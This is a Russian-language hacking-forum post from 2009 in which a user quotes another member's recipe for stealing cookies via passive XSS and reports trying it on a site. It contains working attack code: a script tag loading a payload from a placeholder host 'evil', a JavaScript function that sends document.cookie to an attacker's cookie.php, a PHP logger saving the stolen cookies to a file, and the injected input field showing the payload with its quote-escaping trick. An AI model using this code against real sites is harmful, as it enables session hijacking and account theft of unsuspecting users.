21.11.2009, 11:19
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Сообщение от Ctacok
Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
PHP код:
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
PHP код:
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи. Сделал как ты сказал провери файл cookie.txt он пустой 
посмотрел исходный код нашел место куда записался скрипт вот что там
PHP код:
<input type='text' maxlength='100' size='14' class='text' id='username' name='username' value='\'><script src=http://site.ru/js.js>cookie()</script> <'> <br><br>
|
|
|